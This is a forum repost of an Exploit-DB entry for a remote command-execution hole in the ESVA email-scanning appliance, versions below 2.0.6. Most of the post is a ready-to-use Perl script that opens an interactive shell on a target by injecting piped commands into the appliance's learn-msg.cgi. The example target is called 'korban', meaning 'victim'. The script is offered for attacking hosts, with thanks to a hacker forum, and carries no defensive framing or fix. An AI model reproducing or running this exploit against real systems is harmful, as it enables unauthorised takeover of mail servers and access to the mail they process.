DarkyAngel Posted August 18, 2012 Report Posted August 18, 2012 [table=width: 500, class: grid][tr] [td]EDB-ID: 20551[/td] [td]CVE: N/A[/td] [td]OSVDB-ID: N/A[/td][/tr][tr] [td]Author: iJoo[/td] [td]Published: 2012-08-16[/td] [td]Verified: [/td][/tr][tr] [td]Exploit Code: [/td] [td]Vulnerable App: N/A[/td] [td][/td][/tr][/table]# Exploit Title: E-Mail Security Virtual Appliance (ESVA) Remote Execution.# Date: 10 Aug 2012# Exploit Author: iJoo# Vendor Homepage: http://www.esvacommunity.com/# Software Link: http://sourceforge.net/projects/esva-project/# Version: < 2.0.6ESVA (E-Mail Security Virtual Appliance) is a pre-built and semi-configured email scanning appliance that will run on VMware Workstation, Server, Player or ESX Server.-=+ Infected Files..../cgi-bin/learn-msg.cgi..../cgi-bin/release-msg.cgiNot found any strips/filter to metacharacters..Attacker can easily execute command..-=+ Simple RCE ESVA#! /usr/bin/perluse LWP;use HTTP::Request;if (@ARGV < 1){print "\n==========================================\n";print " ESVA - REMOTE EXECUTION SCRIPT \n";print "==========================================\n";print "Usage: perl esva.pl host (without http://)\n";print "Ex. perl esva.pl www.korban.com\n";exit;}$host=$ARGV[0];print "Try to Execution Command!\n";print "iDSc-shell# ";chomp( $cmd = <STDIN>);while($cmd !~ "exit"){$content = "";$ua = LWP::UserAgent->new();$ua->agent('');$request = HTTP::Request->new (GET => "http://".$host."/cgi-bin/learn-msg.cgi?id=%7c".$cmd."%3b");$response = $ua->request ($request);$content = $response->content;print $content."\n";print "iDSc-shell# ";chomp( $cmd = <STDIN>);}-=+ Thanks toMy lovely Country NKRI INDONESIA!!binh4x staff - www.binushacker.net // Forum.binushacker.netSursa Quote
